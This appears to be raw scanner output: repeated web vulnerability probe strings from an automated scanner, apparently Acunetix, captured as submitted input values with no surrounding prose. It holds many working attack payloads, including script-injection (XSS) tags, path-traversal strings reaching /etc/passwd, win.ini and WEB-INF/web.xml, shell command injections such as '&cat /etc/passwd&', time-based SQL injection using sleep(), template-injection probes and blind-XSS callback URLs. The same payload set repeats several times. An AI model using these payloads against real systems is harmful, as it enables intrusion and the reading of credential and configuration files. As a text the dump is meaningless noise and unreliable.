'"()&%<ScRiPt >prompt(906254)</ScRiPt>

1

1

WEB-INF/web.xml

1

1

1

1_973070

|dir

xUyw3sH6')

1

1

1

1

WEB-INF\web.xml

acu8351\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8351

1

Z1aQ3PMX'))

'|dir

1

../../../../../../../../../../windows/win.ini

1

acux9627\xc0\xbez1\xc0\xbcz2a\x90bcxuca9627

1

"|dir

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(987756)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(958342)</script>

1

1<ScRiPt >prompt(910613)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?961366></ScRiPt>

................windowswin.ini

1

1<ScRiPt >prompt(922599)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(963745)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(902794)"></g></svg>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

1<div style=width:expression(prompt(915438))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<body onload=prompt(991125)>

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(974650)>

WEB-INF/web.xml

1

response.write(9807727*9075375)

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(992030)>

1

1

1

1

'+response.write(9807727*9075375)+'

1

1<img/src=">" onerror=alert(982551)>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<ScRiPt%20>prompt(951463)</sCripT>

"+response.write(9807727*9075375)+"

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1&lt

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

\xf6<img acu onmouseover=prompt(906580) //\xf6>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

1<input autofocus onfocus=prompt(997201)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

${99061+99213}

1

`cat /etc/passwd`

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

<a href='http://www.acunetix.com'>website security</a>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

1

1

1

|cat /etc/passwd#

[url=http://www.acunetix.com]website security[/url]

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

-1)

1&n944382=v972472

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1_EygqE <ScRiPt >prompt(916044)</ScRiPt>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

'|'ld

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

1

testasp.vulnweb.com

1

1YGyxXml'

"|"ld

^(#$!@#$)(()))******

1

S7iZLO9j')

/etc/passwd

1

1

'

1

1

1

1

sWZ019bG'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

1

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hit3e3Ktjg8PL.bxss.me/

1

"

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

||cat /etc/passwd

1

1

1

-1))

1

comments

1

1

&dir

http://www.acunetix.tst

1

'"

comments

1'"()&%<ScRiPt >prompt(998374)</ScRiPt>

3mMM4zTL'

file:///etc/passwd

1

'&dir&'

1

1

comments/.

KPqQYkC1')

'"()&%<ScRiPt >prompt(959458)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

oPlg5Ap1'))

<!--

1

1_944259

1

WEB-INF/web.xml

1

1

|dir

1

1

WEB-INF\web.xml

1

acu8317\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8317

../../../../../../../../../../windows/win.ini

'|dir

1

1

../../../../../../../../../../boot.ini

acux1249\xc0\xbez1\xc0\xbcz2a\x90bcxuca1249

1

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(989035)</ScRiPt>

1

1<script>prompt(987396)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(995105)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906314></ScRiPt>

................windowswin.ini

1

1<ScRiPt >prompt(932769)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(912817)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947766)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(931993))>

1

1

1

1<iframe src='data:text/html

1

1

1

WEB-INF/web.xml

1<body onload=prompt(903624)>

1

WEB-INF\web.xml

1

response.write(9092688*9942926)

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(962244)>

1

1

&cat /etc/passwd&

'+response.write(9092688*9942926)+'

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1<img src=xyz OnErRor=prompt(974881)>

'&cat /etc/passwd&'

"+response.write(9092688*9942926)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(950467)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<ScRiPt%20>prompt(978904)</sCripT>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

cat /etc/passwd

1&lt

1

${100490+100037}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

1&n903419=v912544

1

\xf6<img acu onmouseover=prompt(912250) //\xf6>

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

1

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1<input autofocus onfocus=prompt(920269)>

-1)

1

testasp.vulnweb.com

1

'|'ld

1

-1))

<a href='http://www.acunetix.com'>website security</a>

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

"|"ld

'"()

[url=http://www.acunetix.com]website security[/url]

rX3yNGL3'

1

1

/etc/passwd

"

^(#$!@#$)(()))******

1

1

fRHaC8AQ')

1_t3OeI <ScRiPt >prompt(912768)</ScRiPt>

1

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

xCzE3ZIc'))

1

1

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}\

-1

1

1

1

1

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hittaEW0EFUp0.bxss.me/

1

1

acunetix_wvs_invalid_filename

1

-1)

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

1

http://www.acunetix.tst

comments

1

1

-1))

1

'&dir&'

file:///etc/passwd

comments

1

1'"()&%<ScRiPt >prompt(963086)</ScRiPt>

'"

1

137ZY7xN'

1

comments/.

<!--

'"()&%<ScRiPt >prompt(963833)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

ZtXInIi4')

1

1

1

1

|dir

WEB-INF/web.xml

1_914853

1

vl6SX19B'))

1

1

1

WEB-INF\web.xml

1

1

1

'|dir

1

../../../../../../../../../../windows/win.ini

acu4361\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4361

1

1

1

1

"|dir

acux5078\xc0\xbez1\xc0\xbcz2a\x90bcxuca5078

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(939537)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(991938)</script>

1

1<ScRiPt >prompt(912539)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936240></ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(907739)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(900883)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972755)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

response.write(9951554*9991853)

1

1

1

1<div style=width:expression(prompt(997970))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'+response.write(9951554*9991853)+'

1

1

1

&cat /etc/passwd&

1

1<iframe src='data:text/html

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"+response.write(9951554*9991853)+"

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(903491)>

../../../../../../../../../../etc/passwd

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983393)>

WEB-INF/web.xml

1

if(now()=sysdate(),sleep(3.125),0)/*'XOR(if(now()=sysdate(),sleep(3.125),0))OR'"XOR(if(now()=sysdate(),sleep(3.125),0))OR"*/

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(947535)>

1

WEB-INF\web.xml

(select(0)from(select(sleep(3.125)))v)/*'+(select(0)from(select(sleep(3.125)))v)+'"+(select(0)from(select(sleep(3.125)))v)+"*/

1

${99974+100035}

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n944981=v942143

1<img/src=">" onerror=alert(980650)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

-1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(916602)</sCripT>

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

-1)

)

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

1

"|"ld

-1))

\xf6<img acu onmouseover=prompt(942103) //\xf6>

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

^(#$!@#$)(()))******

1

1

1<input autofocus onfocus=prompt(901548)>

1

/etc/passwd

FhHg39m7'

'

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

[url=http://www.acunetix.com]website security[/url]

uxZJgpsL')

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"

1

mf0e5uUs'))

1_H67ds <ScRiPt >prompt(973620)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

-1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

&dir

http://hit9igEZEhgCl.bxss.me/

1

1

1

file:///etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

1

acunetix_wvs_invalid_filename

1

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

1

http://www.acunetix.tst

1

1

1

comments

'"

"&dir&"

1'"()&%<ScRiPt >prompt(983132)</ScRiPt>

WEB-INF/web.xml

1

1

1

-1))

comments

<!--

|dir

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(923336)</ScRiPt>

XqpBh59h'

comments/.

1

'|dir

1

1

K4UBmhcX')

1

1

../../../../../../../../../../windows/win.ini

1_962043

"|dir

1

1

ZuSIhj6t'))

../../../../../../../../../../boot.ini

1

1

1

1

acu9662\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9662

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acux9805\xc0\xbez1\xc0\xbcz2a\x90bcxuca9805

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(939578)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(910777)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(965505)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959512></ScRiPt>

1

1<ScRiPt >prompt(907350)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(976388)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(997723)"></g></svg>

1

1

1

response.write(9136188*9123152)

1

1<div style=width:expression(prompt(968346))>

1

'+response.write(9136188*9123152)+'

1

1

1

1<iframe src='data:text/html

1

WEB-INF/web.xml

"+response.write(9136188*9123152)+"

1

&cat /etc/passwd&

1<body onload=prompt(949201)>

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(950260)>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=xyz OnErRor=prompt(935501)>

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img/src=">" onerror=alert(967103)>

1

1

1

${99222+99138}

1

|cat /etc/passwd#

1<ScRiPt%20>prompt(900190)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

1

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1&n933134=v903251

)

"|"ld

\xf6<img acu onmouseover=prompt(960023) //\xf6>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

1<input autofocus onfocus=prompt(970059)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

1

testasp.vulnweb.com

7qZfobmv'

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

'

1

1

1

'

HBAXpq9B')

1

[url=http://www.acunetix.com]website security[/url]

1

1

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

GOz9XJrP'))

1_hpqnQ <ScRiPt >prompt(911732)</ScRiPt>

1

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

http://hitj7Zz6DbCU8.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

1

comments

1

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

1

1

comments

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1

1

-1))

file:///etc/passwd

comments/.

"&dir&"

1

'"

1

1

1

1'"()&%<ScRiPt >prompt(971312)</ScRiPt>

bYsuojeh'

/\../\../\../\../\../\../\../etc/passwd

1

1

<!--

|dir

'"()&%<ScRiPt >prompt(971581)</ScRiPt>

zMmpr9ff')

1

WEB-INF/web.xml

1

1

1

'|dir

1

1_924132

1

1

qwrEdTXk'))

1

WEB-INF\web.xml

1

"|dir

1

1

1

1

../../../../../../../../../../windows/win.ini

../../../../../../../../../../boot.ini

1

1

acu6674\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6674

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux6778\xc0\xbez1\xc0\xbcz2a\x90bcxuca6778

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(984841)</ScRiPt>

1

................windowswin.ini

1

1

1

1<script>prompt(902379)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(939331)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990638></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(920814)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(991710)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947556)"></g></svg>

1

response.write(9687338*9271528)

1

1

1<div style=width:expression(prompt(986694))>

1

1

'+response.write(9687338*9271528)+'

1

WEB-INF/web.xml

1<iframe src='data:text/html

1

1

WEB-INF\web.xml

1<body onload=prompt(962457)>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9687338*9271528)+"

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987619)>

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(6.158),0)/*'XOR(if(now()=sysdate(),sleep(6.158),0))OR'"XOR(if(now()=sysdate(),sleep(6.158),0))OR"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(984614)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(6.158)))v)/*'+(select(0)from(select(sleep(6.158)))v)+'"+(select(0)from(select(sleep(6.158)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(999067)>

${99936+99939}

1

1

1

cat /etc/passwd

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt%20>prompt(991082)</sCripT>

1

1

1

1&n981034=v912252

1some_inexistent_file_with_long_name%00.jpg

`cat /etc/passwd`

-1)

1

1&lt

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

|cat /etc/passwd#

-1))

\xf6<img acu onmouseover=prompt(941738) //\xf6>

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

'|'ld

'"()

avwZuAP7'

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(941947)>

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

"|"ld

1

<a href='http://www.acunetix.com'>website security</a>

1

vy7Rd6NK')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

/etc/passwd

1

"

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

mSVbbk9S'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

'

1

1

1_7xYjs <ScRiPt >prompt(937137)</ScRiPt>

-1

http://hitpP5zmDjRKT.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"

acunetix_wvs_invalid_filename

1

-1)

1

1

1

1

1

comments

||cat /etc/passwd

1

-1))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(965806)</ScRiPt>

comments

1

1

'"

uq1t8u31'

&dir

'"()&%<ScRiPt >prompt(972481)</ScRiPt>

1

comments/.

1

'&dir&'

1

<!--

pSeHnZo6')

file:///etc/passwd

1_911650

1

1

1

"&dir&"

1

AiFCLAlk'))

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

|dir

1

acu4387\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4387

1

1

'|dir

1

WEB-INF/web.xml

1

"|dir

acux9107\xc0\xbez1\xc0\xbcz2a\x90bcxuca9107

1

1

WEB-INF\web.xml

1

1

1<ScRiPt >prompt(938193)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1<script>prompt(923344)</script>

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(909733)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?923627></ScRiPt>

1

1

1

1<ScRiPt >prompt(908782)</ScRiPt>

................windowswin.ini

1

1<video><source onerror="javascript:prompt(935003)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(948323)"></g></svg>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<div style=width:expression(prompt(951648))>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<iframe src='data:text/html

response.write(9818514*9753942)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

'+response.write(9818514*9753942)+'

1<body onload=prompt(910264)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9818514*9753942)+"

&cat /etc/passwd&

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(972754)>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(928987)>

1

"&cat /etc/passwd&"

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

WEB-INF\web.xml

1<img/src=">" onerror=alert(941771)>

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

${100264+99903}

1

-1

1<ScRiPt%20>prompt(994221)</sCripT>

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

1

|cat /etc/passwd#

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n906903=v939936

)

-1))

1some_inexistent_file_with_long_name%00.jpg

\xf6<img acu onmouseover=prompt(947526) //\xf6>

1

'|'ld

1

1

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

rfe2hbKZ'

1<input autofocus onfocus=prompt(976206)>

'"()

1

"|"ld

1

testasp.vulnweb.com

^(#$!@#$)(()))******

iEZzCq9k')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

'

1

1

eSBAR2UR'))

1

[url=http://www.acunetix.com]website security[/url]

/etc/passwd

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

-1

1

1_ngVTM <ScRiPt >prompt(997870)</ScRiPt>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

"

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

-1))

http://hitoT0Yr3RRdh.bxss.me/

